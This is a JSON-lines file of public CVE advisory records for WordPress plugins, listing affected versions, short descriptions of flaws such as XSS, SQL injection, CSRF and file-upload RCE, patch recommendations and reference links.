{"CVE_ID":"CVE-2023-4536","slug":"my-account-page-editor","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The My Account Page Editor WordPress plugin before 1.3.2 does not validate the profile picture to be uploaded, allowing any authenticated users, such as subscriber to upload arbitrary files to the server, leading to RCE","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80e0e21c-9e6e-406d-b598-18eb222b3e3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/80e0e21c-9e6e-406d-b598-18eb222b3e3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1845","slug":"vikrentcar","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The VikRentCar Car Rental Management System WordPress plugin before 1.3.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8d7b564-36e0-4f05-9b49-1b441f453d0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8d7b564-36e0-4f05-9b49-1b441f453d0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2752","slug":"wc-customer-source","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Where Did You Hear About Us Checkout Field for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via order meta in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with shop manager-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbee3720-6ab9-4470-b2d2-09824db8de4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbee3720-6ab9-4470-b2d2-09824db8de4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075865%40wc-customer-source%2Ftrunk&old=3054024%40wc-customer-source%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075865%40wc-customer-source%2Ftrunk&old=3054024%40wc-customer-source%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13373","slug":"exertio-framework","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Exertio Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.1. This is due to the plugin not properly validating a user's identity prior to updating their password through the fl_forgot_pass_new() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/exertio-freelance-marketplace-wordpress-theme\\\/30602587\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/exertio-freelance-marketplace-wordpress-theme\\\/30602587\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/897ce9a9-8b3e-40bc-9815-c55cc7a838f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/897ce9a9-8b3e-40bc-9815-c55cc7a838f9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31015","slug":"mailhawk","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Adrian Tobey WordPress SMTP Service, Email Delivery Solved! \u2014 MailHawk allows PHP Local File Inclusion. This issue affects WordPress SMTP Service, Email Delivery Solved! \u2014 MailHawk: from n\/a through 1.3.1.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mailhawk\\\/vulnerability\\\/wordpress-wordpress-smtp-service-email-delivery-solved-mailhawk-1-3-1-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/mailhawk\\\/vulnerability\\\/wordpress-wordpress-smtp-service-email-delivery-solved-mailhawk-1-3-1-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2542","slug":"embed-form","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Jotform Online Forms \u2013 Drag & Drop Form Builder, Securely Embed Contact Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-32527 is likely a duplicate of this issue.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c34a01-a0d1-4305-b74b-b5a568a42b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90c34a01-a0d1-4305-b74b-b5a568a42b13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073311%40embed-form%2Ftrunk&old=2981633%40embed-form%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073311%40embed-form%2Ftrunk&old=2981633%40embed-form%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4489","slug":"woocommerce-products-filter","versionEndExcluding":"1.3.2","description":"The HUSKY WordPress plugin before 1.3.2 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/067573f2-b1e6-49a9-8c5b-f91e3b9d722f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/067573f2-b1e6-49a9-8c5b-f91e3b9d722f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4695","slug":"move-addons","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72662a59-f41c-4df7-aa04-7243ff43c48d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72662a59-f41c-4df7-aa04-7243ff43c48d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/data-table\\\/widget.php#L836\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/data-table\\\/widget.php#L836\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/team-member\\\/widget.php#L1464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/team-member\\\/widget.php#L1464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/event-calendar\\\/widget.php#L932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/event-calendar\\\/widget.php#L932\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/mailchimp\\\/widget.php#L728\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/mailchimp\\\/widget.php#L728\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/user-login\\\/widget.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/user-login\\\/widget.php#L1146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/shop-product-grid\\\/widget.php#L1203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/move-addons\\\/trunk\\\/includes\\\/widgets\\\/shop-product-grid\\\/widget.php#L1203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088859\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12059","slug":"elementinvader-addons-for-elementor","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.1 via the eli_option_value shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract arbitrary options from the wp_options table.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203139%40elementinvader-addons-for-elementor&new=3203139%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203139%40elementinvader-addons-for-elementor&new=3203139%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf7ec469-70b7-4ec2-83df-c788c76730b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf7ec469-70b7-4ec2-83df-c788c76730b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11766","slug":"gs-books-showcase","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The WordPress Book Plugin for Displaying Books in Grid, Flip, Slider, Popup Layout and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_book_showcase' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-books-showcase\\\/tags\\\/1.3.1\\\/gs-bookshowcase-files\\\/includes\\\/templates\\\/gs_bookshowcase_structure_1_square.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-books-showcase\\\/tags\\\/1.3.1\\\/gs-bookshowcase-files\\\/includes\\\/templates\\\/gs_bookshowcase_structure_1_square.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204642%40gs-books-showcase&new=3204642%40gs-books-showcase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204642%40gs-books-showcase&new=3204642%40gs-books-showcase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b40b73-4dec-4a96-a634-3bd3d74616ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3b40b73-4dec-4a96-a634-3bd3d74616ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13802","slug":"bandsintown","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The Bandsintown Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bandsintown_events' shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bandsintown\\\/tags\\\/1.3.1\\\/bandsintown.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bandsintown\\\/tags\\\/1.3.1\\\/bandsintown.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bab22f2e-0998-4401-ae9f-45bdce658c4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bab22f2e-0998-4401-ae9f-45bdce658c4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13713","slug":"wpexperts-square-for-give","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The WPExperts Square For GiveWP plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242658\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242658\\\/wpexperts-square-for-give\\\/trunk\\\/includes\\\/class-give-square.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7863c5fb-1eda-41a3-b8ec-054784ab2438?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7863c5fb-1eda-41a3-b8ec-054784ab2438?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13539","slug":"aforms-eats","versionImpact":"1.3.1","versionEndExcluding":"1.3.2","description":"The AForms Eats plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.3.1. This is due to the \/vendor\/aura\/payload-interface\/phpunit.php file being publicly accessible and displaying error messages. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-eats\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-eats\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232963%40aforms-eats&new=3232963%40aforms-eats&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232963%40aforms-eats&new=3232963%40aforms-eats&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e1950c7-cc7c-48cf-974e-f691ef61d6be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e1950c7-cc7c-48cf-974e-f691ef61d6be?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12312","slug":"print-science-designer","versionImpact":"1.3.152","versionEndExcluding":"1.3.153","description":"The Print Science Designer plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.152 via deserialization of untrusted input through the 'designer-saved-projects' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.153, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.152\\\/includes\\\/saved-projects.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.152\\\/includes\\\/saved-projects.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.153\\\/includes\\\/saved-projects.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/print-science-designer\\\/tags\\\/1.3.153\\\/includes\\\/saved-projects.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8008b5e2-f3b4-492c-8e50-b673f725b2b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8008b5e2-f3b4-492c-8e50-b673f725b2b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9218","slug":"magazine-blocks","versionImpact":"1.3.14","versionEndExcluding":"1.3.15","description":"The Magazine Blocks \u2013 Blog Designer, Magazine & Newspaper Website Builder, Page Builder with Posts Blocks, Post Grid plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.14. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4c27225-f9db-4ae5-bb1f-ce8648c216eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4c27225-f9db-4ae5-bb1f-ce8648c216eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161000\\\/#file13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161000\\\/#file13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magazine-blocks\\\/tags\\\/1.3.14\\\/includes\\\/Blocks.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magazine-blocks\\\/tags\\\/1.3.14\\\/includes\\\/Blocks.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9450","slug":"easync-booking","versionImpact":"1.3.14","versionEndExcluding":"1.3.15","description":"The Free Booking Plugin for Hotels, Restaurants and Car Rentals  WordPress plugin before 1.3.15 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in subscriber change them via a CSRF attack","recommendation":"Update to version 1.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b9568a-af74-40df-89c1-550e8515ca0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4b9568a-af74-40df-89c1-550e8515ca0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8277","slug":"woocommerce-photo-reviews","versionImpact":"1.3.13.2","versionEndExcluding":"1.3.14","description":"The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as a user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.","recommendation":"Update to version 1.3.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-photo-reviews\\\/21245349\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-photo-reviews\\\/21245349\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8662","slug":"koko-analytics","versionImpact":"1.3.12","versionEndExcluding":"1.3.13","description":"The Koko Analytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.12. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd15c7c8-6538-4443-a409-0d34ff893963?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd15c7c8-6538-4443-a409-0d34ff893963?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153087\\\/koko-analytics\\\/trunk\\\/src\\\/views\\\/settings-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153087\\\/koko-analytics\\\/trunk\\\/src\\\/views\\\/settings-page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koko-analytics\\\/tags\\\/1.3.12\\\/src\\\/views\\\/settings-page.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/koko-analytics\\\/tags\\\/1.3.12\\\/src\\\/views\\\/settings-page.php#L33\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7147","slug":"jet-blocks","versionImpact":"1.3.12","versionEndExcluding":"1.3.12.1","description":"The JetBlocks for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple placeholder parameters in all versions up to, and including, 1.3.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8908c-bcfc-4ca1-bc8b-80a80c4a5a4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21f8908c-bcfc-4ca1-bc8b-80a80c4a5a4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetblocks\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetblocks\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1118","slug":"podlove-subscribe-button","versionImpact":"1.3.10","versionEndExcluding":"1.3.11","description":"The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-subscribe-button-wp-plugin\\\/commit\\\/b16b7a2e98db4c642ca671b0aede4dbfce4578b3\",\"name\":\"https:\\\/\\\/github.com\\\/podlove\\\/podlove-subscribe-button-wp-plugin\\\/commit\\\/b16b7a2e98db4c642ca671b0aede4dbfce4578b3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-51682","slug":"ht-builder","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HasThemes HT Builder \u2013 WordPress Theme Builder for Elementor allows Stored XSS.This issue affects HT Builder \u2013 WordPress Theme Builder for Elementor: from n\/a through 1.3.0.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ht-builder\\\/wordpress-ht-builder-wordpress-theme-builder-for-elementor-plugin-1-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ht-builder\\\/wordpress-ht-builder-wordpress-theme-builder-for-elementor-plugin-1-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4298","slug":"123-chat-videochat","versionEndExcluding":"1.3.1","description":"The 123.chat WordPress plugin before 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36285052-8464-4fd6-b4b1-c175e730edad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36285052-8464-4fd6-b4b1-c175e730edad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
